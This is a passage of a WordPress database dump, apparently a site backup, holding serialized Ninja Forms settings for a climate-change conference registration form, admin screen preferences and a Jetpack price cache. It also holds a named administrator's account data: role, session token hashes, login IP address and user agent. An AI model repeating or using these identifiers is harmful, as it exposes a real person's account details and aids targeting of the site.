Registration\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"1\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:3:\"key\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:10:{i:0;s:77:\"icfsrm_2022_conference_is_climate_change_challenges_and_threats_1668262317133\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:7:\"textbox\";i:6;s:4:\"hr_1\";i:7;s:4:\"hr_2\";i:8;s:4:\"html\";i:9;s:8:\"register\";}s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";}s:6:\"fields\";a:10:{i:5;a:1:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"1\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:68:\"ICFSRM 2022 Conference is \" Climate change, challenges and threats \"\";s:3:\"key\";s:77:\"icfsrm_2022_conference_is_climate_change_challenges_and_threats_1668262317133\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:11:\"<p><br></p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:23:\"Event Intro Description\";s:9:\"field_key\";s:23:\"event_intro_description\";s:14:\"drawerDisabled\";b:0;}}i:6;a:1:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"2\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:2:\"hr\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:2:\"hr\";}}i:7;a:1:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:10:\"First Name\";s:3:\"key\";s:9:\"firstname\";s:4:\"type\";s:9:\"firstname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:9:\"firstname\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}}i:8;a:1:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"4\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:9:\"Last Name\";s:3:\"key\";s:8:\"lastname\";s:4:\"type\";s:8:\"lastname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:8:\"lastname\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}}i:9;a:1:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"5\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:5:\"email\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}}i:10;a:1:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"6\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Phone\";s:3:\"key\";s:7:\"textbox\";s:4:\"type\";s:7:\"textbox\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:7:\"textbox\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}}i:11;a:1:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"7\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:4:\"hr_1\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:4:\"hr_1\";}}i:15;a:1:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"11\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:4:\"hr_2\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:4:\"hr_2\";}}i:16;a:1:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"12\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:3:\"key\";s:4:\"html\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:480:\"<p>Below, you can find a map of the event venue.<br>\nPlease contact us for any further details</p>\n\n\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3105.150199370797!2d-77.03871848503316!3d38.897680454533216!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89b7b7bcdecbb1df%3A0x715969d86d0b76bf!2sThe+White+House!5e0!3m2!1sen!2sus!4v1472415172562\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen=\"\" title=\"Event Location\"></iframe>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:4:\"HTML\";s:9:\"field_key\";s:4:\"html\";s:14:\"drawerDisabled\";s:0:\"\";}}i:17;a:1:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"13\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:8:\"Register\";s:3:\"key\";s:8:\"register\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:8:\"Register\";s:9:\"field_key\";s:8:\"register\";}}}s:7:\"actions\";a:4:{i:5;a:1:{s:8:\"settings\";a:34:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:17:\"Record Submission\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:14:\"drawerDisabled\";b:0;}}i:6;a:1:{s:8:\"settings\";a:27:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:23:\"User Email Confirmation\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:2:\"to\";s:13:\"{field:email}\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:39:\"Thank you for registering for our event\";s:13:\"email_message\";s:72:\"<p>Your registration details are below:</p><p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:20:\"{system:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:19:\"email_message_plain\";s:0:\"\";}}i:7;a:1:{s:8:\"settings\";a:27:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:24:\"Admin Email Notification\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:2:\"to\";s:20:\"{system:admin_email}\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:62:\"New Event Registration from {field:firstname} {field:lastname}\";s:13:\"email_message\";s:67:\"<p>Registration details are below:</p><p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:19:\"email_message_plain\";s:0:\"\";}}i:8;a:1:{s:8:\"settings\";a:33:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:15:\"Success Message\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";s:1:\"1\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:47:\"<p>Thank you for registering for our event.</p>\";s:9:\"parent_id\";s:1:\"2\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";}}}}'),
(50,1,'closedpostboxes_dt_team','a:0:{}'),
(51,1,'metaboxhidden_dt_team','a:9:{i:0;s:25:\"slider_revolution_metabox\";i:1;s:19:\"dt_page_box-sidebar\";i:2;s:18:\"dt_page_box-footer\";i:3;s:33:\"dt_page_box-page_vertical_margins\";i:4;s:32:\"dt_page_box-mobile_page_paddings\";i:5;s:28:\"dt_page_box-teammate_options\";i:6;s:12:\"wpb_wpbakery\";i:7;s:29:\"dt_page_box-slideshow_options\";i:8;s:32:\"dt_page_box-fancy_header_options\";}'),
(52,1,'meta-box-order_dt_team','a:3:{s:6:\"normal\";s:62:\"dt_page_box-slideshow_options,dt_page_box-fancy_header_options\";s:8:\"advanced\";s:26:\"dt_page_box-header_options\";s:4:\"side\";s:187:\"slider_revolution_metabox,the7-post-meta-presets-box,dt_page_box-sidebar,dt_page_box-footer,dt_page_box-page_vertical_margins,dt_page_box-mobile_page_paddings,dt_page_box-teammate_options\";}'),
(86,4,'nickname','nagy'),
(87,4,'first_name','Nagy'),
(88,4,'last_name','K. Aly'),
(89,4,'description',''),
(90,4,'rich_editing','true'),
(91,4,'syntax_highlighting','true'),
(92,4,'comment_shortcuts','false'),
(93,4,'admin_color','fresh'),
(94,4,'use_ssl','0'),
(95,4,'show_admin_bar_front','true'),
(96,4,'locale',''),
(97,4,'dnctiavkr_capabilities','a:1:{s:13:\"administrator\";b:1;}'),
(98,4,'dnctiavkr_user_level','10'),
(99,4,'dismissed_wp_pointers','vc_pointers_backend_editor'),
(100,4,'session_tokens','a:2:{s:64:\"9db289cb9eee1ba751d16d3ee89559cc4d40084daff02fee86759fee37bc52ca\";a:4:{s:10:\"expiration\";i:1692119862;s:2:\"ip\";s:13:\"197.48.78.198\";s:2:\"ua\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15\";s:5:\"login\";i:1691947062;}s:64:\"5306d9d974ccc03e9b80b89b2ba1c2f71fa4086c866d28d05a32acac25df8cde\";a:4:{s:10:\"expiration\";i:1693157799;s:2:\"ip\";s:13:\"197.48.78.198\";s:2:\"ua\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15\";s:5:\"login\";i:1691948199;}}'),
(101,4,'dnctiavkr_dashboard_quick_press_last_post_id','5138'),
(102,4,'community-events-location','a:1:{s:2:\"ip\";s:11:\"197.48.78.0\";}'),
(103,4,'closedpostboxes_page','a:1:{i:0;s:33:\"dt_page_box-page_vertical_margins\";}'),
(104,4,'metaboxhidden_page','a:22:{i:0;s:21:\"dt_page_box-microsite\";i:1;s:29:\"dt_page_box-slideshow_options\";i:2;s:32:\"dt_page_box-fancy_header_options\";i:3;s:24:\"dt_page_box-page_content\";i:4;s:24:\"dt_page_box-display_blog\";i:5;s:24:\"dt_page_box-blog_options\";i:6;s:29:\"dt_page_box-display_portfolio\";i:7;s:29:\"dt_page_box-portfolio_options\";i:8;s:26:\"dt_page_box-display_albums\";i:9;s:26:\"dt_page_box-albums_options\";i:10;s:32:\"dt_page_box-display_albums_media\";i:11;s:25:\"dt_page_box-media_options\";i:12;s:24:\"dt_page_box-display_team\";i:13;s:24:\"dt_page_box-team_options\";i:14;s:32:\"dt_page_box-display_testimonials\";i:15;s:32:\"dt_page_box-testimonials_options\";i:16;s:10:\"postcustom\";i:17;s:16:\"commentstatusdiv\";i:18;s:11:\"commentsdiv\";i:19;s:7:\"slugdiv\";i:20;s:9:\"authordiv\";i:21;s:26:\"dt_page_box-microsite_logo\";}'),
(105,4,'dnctiavkr_user-settings','post_settings_vcUIPanelWidth=650&post_settings_vcUIPanelLeft=756px&post_settings_vcUIPanelTop=74px&edit_element_vcUIPanelWidth=650&edit_element_vcUIPanelLeft=931px&edit_element_vcUIPanelTop=73px&editor=tinymce&hidetb=1&libraryContent=browse&post_dfw=off&advImgDetails=show'),
(106,4,'dnctiavkr_user-settings-time','1688128973'),
(107,4,'dnctiavkr_persisted_preferences','a:3:{s:17:\"core/edit-widgets\";a:3:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;s:12:\"fixedToolbar\";b:1;}s:9:\"_modified\";s:24:\"2023-06-27T09:27:48.556Z\";s:14:\"core/edit-post\";a:3:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;s:10:\"openPanels\";a:1:{i:0;s:11:\"post-status\";}}}'),
(108,4,'nav_menu_recently_edited','5'),
(109,4,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),
(110,4,'metaboxhidden_nav-menus','a:11:{i:1;s:26:\"add-post-type-dt_portfolio\";i:2;s:21:\"add-post-type-dt_team\";i:3;s:29:\"add-post-type-dt_testimonials\";i:4;s:26:\"add-post-type-dt_slideshow\";i:5;s:24:\"add-post-type-dt_gallery\";i:6;s:12:\"add-post_tag\";i:7;s:25:\"add-dt_portfolio_category\";i:8;s:21:\"add-dt_portfolio_tags\";i:9;s:28:\"add-dt_testimonials_category\";i:10;s:20:\"add-dt_team_category\";i:11;s:23:\"add-dt_gallery_category\";}'),
(111,4,'give_is_donation_forms_menu_updated','1'),
(112,4,'meta-box-order_page','a:3:{s:4:\"side\";s:235:\"submitdiv,pageparentdiv,slider_revolution_metabox,the7-post-meta-presets-box,dt_page_box-microsite,dt_page_box-menus,postimagediv,dt_page_box-sidebar,dt_page_box-footer,dt_page_box-page_vertical_margins,dt_page_box-mobile_page_paddings\";s:6:\"normal\";s:524:\"wpb_wpbakery,dt_page_box-slideshow_options,dt_page_box-fancy_header_options,dt_page_box-page_content,dt_page_box-display_blog,dt_page_box-blog_options,dt_page_box-display_portfolio,dt_page_box-portfolio_options,dt_page_box-display_albums,dt_page_box-albums_options,dt_page_box-display_albums_media,dt_page_box-media_options,dt_page_box-display_team,dt_page_box-team_options,dt_page_box-display_testimonials,dt_page_box-testimonials_options,postcustom,commentstatusdiv,commentsdiv,slugdiv,authordiv,dt_page_box-microsite_logo\";s:8:\"advanced\";s:48:\"dt_page_box-header_options,the7-demo-content-box\";}'),
(113,4,'screen_layout_page','2'),
(114,4,'closedpostboxes_','a:0:{}'),
(115,4,'metaboxhidden_','a:10:{i:0;s:25:\"slider_revolution_metabox\";i:1;s:26:\"the7-post-meta-presets-box\";i:2;s:19:\"dt_page_box-sidebar\";i:3;s:18:\"dt_page_box-footer\";i:4;s:33:\"dt_page_box-page_vertical_margins\";i:5;s:32:\"dt_page_box-mobile_page_paddings\";i:6;s:28:\"dt_page_box-teammate_options\";i:7;s:26:\"dt_page_box-header_options\";i:8;s:29:\"dt_page_box-slideshow_options\";i:9;s:32:\"dt_page_box-fancy_header_options\";}'),
(116,4,'closedpostboxes_post','a:0:{}'),
(117,4,'metaboxhidden_post','a:0:{}'),
(118,4,'meta-box-order_post','a:3:{s:6:\"normal\";s:102:\"wpb_wpbakery,dt_page_box-slideshow_options,dt_page_box-fancy_header_options,dt_page_box-microsite_logo\";s:8:\"advanced\";s:51:\"dt_page_box-post_options,dt_page_box-header_options\";s:4:\"side\";s:171:\"slider_revolution_metabox,dt_page_box-microsite,dt_page_box-menus,dt_page_box-sidebar,dt_page_box-footer,dt_page_box-page_vertical_margins,dt_page_box-mobile_page_paddings\";}'),
(120,1,'meta-box-order_post','a:3:{s:4:\"side\";s:237:\"submitdiv,categorydiv,tagsdiv-post_tag,slider_revolution_metabox,pageparentdiv,dt_page_box-microsite,dt_page_box-menus,postimagediv,dt_page_box-sidebar,dt_page_box-footer,dt_page_box-page_vertical_margins,dt_page_box-mobile_page_paddings\";s:6:\"normal\";s:226:\"wpb_wpbakery,dt_page_box-header_options,dt_page_box-slideshow_options,dt_page_box-fancy_header_options,dt_page_box-post_options,postexcerpt,trackbacksdiv,postcustom,commentstatusdiv,slugdiv,authordiv,dt_page_box-microsite_logo\";s:8:\"advanced\";s:0:\"\";}'),
(121,1,'screen_layout_post','2'),
(127,1,'wpforms_dismissed','a:3:{s:37:\"edu-builder-notifications-description\";i:1692572353;s:20:\"edu-admin-notice-bar\";i:1692739178;s:20:\"edu-edit-post-notice\";i:1692744734;}'),
(128,1,'frm_reviewed','a:3:{s:4:\"time\";i:1692741507;s:9:\"dismissed\";b:0;s:5:\"asked\";i:0;}'),
(130,1,'my-jetpack-cache-date','1692742211'),
(131,1,'my-jetpack-cache','O:8:\"stdClass\":64:{s:15:\"jetpack_premium\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2000;s:12:\"product_name\";s:15:\"Jetpack Premium\";s:12:\"product_slug\";s:15:\"jetpack_premium\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-premium\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$99.00\";s:21:\"combined_cost_display\";s:6:\"$99.00\";s:4:\"cost\";i:99;s:18:\"cost_smallest_unit\";i:9900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$8.25\";}s:16:\"jetpack_business\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2001;s:12:\"product_name\";s:20:\"Jetpack Professional\";s:12:\"product_slug\";s:16:\"jetpack_business\";s:11:\"description\";s:68:\"Daily Backups, Security Scanning, Spam Protection, Polls and Surveys\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-business\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$299.00\";s:21:\"combined_cost_display\";s:7:\"$299.00\";s:4:\"cost\";i:299;s:18:\"cost_smallest_unit\";i:29900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:6:\"$24.92\";}s:12:\"jetpack_free\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2002;s:12:\"product_name\";s:12:\"Jetpack Free\";s:12:\"product_slug\";s:12:\"jetpack_free\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-free\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:5:\"$0.00\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:22:\"product_term_localized\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:23:\"jetpack_premium_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2003;s:12:\"product_name\";s:15:\"Jetpack Premium\";s:12:\"product_slug\";s:23:\"jetpack_premium_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-premium\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.00\";s:21:\"combined_cost_display\";s:5:\"$9.00\";s:4:\"cost\";i:9;s:18:\"cost_smallest_unit\";i:900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_business_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2004;s:12:\"product_name\";s:20:\"Jetpack Professional\";s:12:\"product_slug\";s:24:\"jetpack_business_monthly\";s:11:\"description\";s:67:\"Daily Backups, Malware Scanning, Threat Resolution, Spam Protection\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-business\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.00\";s:21:\"combined_cost_display\";s:6:\"$29.00\";s:4:\"cost\";i:29;s:18:\"cost_smallest_unit\";i:2900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:16:\"jetpack_personal\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2005;s:12:\"product_name\";s:16:\"Jetpack 